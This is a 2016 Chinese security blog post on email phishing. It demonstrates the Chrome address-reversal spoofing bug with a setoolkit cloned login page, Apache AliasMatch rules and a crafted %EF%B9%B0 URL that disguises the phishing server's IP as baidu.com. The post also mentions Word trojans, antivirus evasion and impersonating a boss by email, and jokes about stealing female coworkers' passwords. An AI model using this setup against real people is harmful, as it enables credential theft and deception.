邮箱钓鱼那些事:Chrome地址反转漏洞应用案例

阅读量158423

|

发布时间 : 2016-08-24 20:42:50

https://p4.ssl.qhimg.com/t0152ce029366c68695.png

作者:bsmali4

先说说最近看到一个比较有意思的漏洞,谷歌浏览器(chrome)地址反转,后面我们会讲到。有一天,你的邮箱收到了一条不可思议的邮件,可能来自你的boss或者你最好的朋友,不要觉得奇怪,很有可能,你被邮箱钓鱼了。


攻击手法

1.基础篇:

比较简单和常用的手法,就是链接钓鱼了,发送一些具有诱惑性的链接,比如说,某某,我在这里

http://p2.qhimg.com/t0110f155ce0ea973b4.png

 上传了我们班的照片,然后就提示你用QQ登录,然后真的有很多人上当了,妹子居多,比较萌嘛。当然这些都比较明显,可是如果利用qq的URL跳转漏洞呢?是不是十分诱惑。qq空间的真实案例非常具有诱惑性的链接,特别事对于手机用户,那么长的链接,根本不会去看那个网址,so,你被钓鱼了。

2.进阶篇

当然如果是上面说到的基础钓鱼,懂点电脑的人都能看出来。可是如果你公司业务本身就存在一些漏洞,比如xss呢?直接发一条打xss的链接岂不是更爽。这些真实案例特别多,乌云上面很多很多。

http://p3.qhimg.com/t01c53208edbf1110c3.png

这类案例也比较多,人家发来的是一个xss链接,如果发来的木马呢?是不是也要点开?什么,我不会去点开exe的,那么word木马呢?什么,我又杀毒软件,额,如果免杀了呢。发送word木马这类攻击手法对于中小型公司有奇效,往往是撕开内网的口子。这也是一些apt攻击比较常见的手法吧。

3.猥琐篇前面讲到了最近谷歌浏览器网址诈骗漏洞

详情请看 http://www.freebuf.com/vuls/112259.html

我就做了个实验来玩

实验环境:

kali一台

若干恍恍惚惚的员工

调用工具setoolkit

http://p3.qhimg.com/t01a15bbd7f2d4ad591.png

http://p4.qhimg.com/t01db68662e0fa4c5b7.png

http://p4.qhimg.com/t01a5642e515eeaaec3.png

http://p2.qhimg.com/t017c604a76dad1267d.png

http://p3.qhimg.com/t016dc3bf86d7abce62.png

总结起来就是调用setoolkit克隆一个网站,然后纪录post的数据,十分具有诱惑性的。要外网的虚拟机话记得映射下,访问下,额,十分的逼真。废话,就是右键源代码过来的。我还是以某个别的系统为例吧,公司的东西不好演示。假设某个系统(以wp来表示公司需要登录账号密码的系统)

一个钓鱼网站搭建好了,下面我们怎么去利用浏览器缺陷钓鱼呢?

http://p5.qhimg.com/t01c71a2fd50829cfec.png

freebuf上面给的是  http://182.176.65.7/%EF%B9%B0/http:/google.com/test

我们伪造成(为什么这么长?url反向之后干扰效果比较好)

http://192.168.1.106
(你的钓鱼服务器ip)/%EF%B9%B0/http://www.baidu.com/seesionid/WsssXN201608s19008500041?refer=www.baidu.com&cur_pos=1&_wv=1&_rp=1&bkt=0&ssid=WXN2ss01608190085000wwww41

谷歌浏览器访问测试下, 当然是失败的,因为我们服务器没有那个文件,我们看看log就知道实际请求是啥了。

http://p5.qhimg.com/t0160c1e8e9b4cb04d3.png

get过来的是

GET /%EF%B9%B0/http://www.baidu.com/seesionid/WsssXN201608s19008500041?refer=www.baidu.com&cur_pos=1&_wv=1&_rp=1&bkt=0&ssid=WXN2ss01608190085000wwww41 HTTP/1.1" 200 1515 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/5

很有必要配置下apache

找到apache配置文件/etc/apache2/apache2.conf

http://p1.qhimg.com/t0102c638f61dd8c910.png

添加两条纪录:

AliasMatch ^/post.php /var/www/html/post.php
AliasMatch ^/.* /var/www/html/index.html

然后重启apache

http://p9.qhimg.com/t0179cb19e2031cce1e.png

将所有的请求都交给index.html这样做有一个好处,当资源不存在的时候,也会转到首页

为什么post.php在前面因为我门钓鱼网页post 表单的时候,里面加了我门的钓鱼post.php。看源代码吧。

我门这时候再访问伪造好的链接

http://192.168.1.106/%EF%B9%B0/http://www.baidu.com/seesionid/WsssXN201608s19008500041?refer=www.baidu.com&cur_pos=1&_wv=1&_rp=1&bkt=0&ssid=WXN2ss01608190085000wwww41

http://p1.qhimg.com/t014008d4941d0cd189.png

浏览器访问的是192.168.1.106,链接显示的却是www.baidu.com/巴拉巴拉,迷惑性极强,然后登录下,账号密码就被纪录了。

http://p8.qhimg.com/t01894b264ea00b6e2e.png

他会发现浏览器跳转到了真正的网址,嗯…..

但是还是很明显啊,因为要发的链接是

http://192.168.1.106/%EF%B9%B0/http://www.baidu.com/seesionid/WsssXN201608s19008500041?refer=www.baidu.com&cur_pos=1&_wv=1&_rp=1&bkt=0&ssid=WXN2ss01608190085000wwww41

还不够猥琐?这个时候你就要找到那些url重定向漏洞业务了,在url编码之类的,是不是更加具有迷惑性呢?

如果再伪造下邮箱以上司的口吻发呢,一大波公司萌妹子要上当了,妹子账号密码都有了,然而你还是单身狗。

https://p3.ssl.qhimg.com/t011fdec3c12f228bac.png

本文由bsmali4原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/84446

安全客 - 有思想的安全新媒体

分享到:微信
+10赞
收藏
bsmali4
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66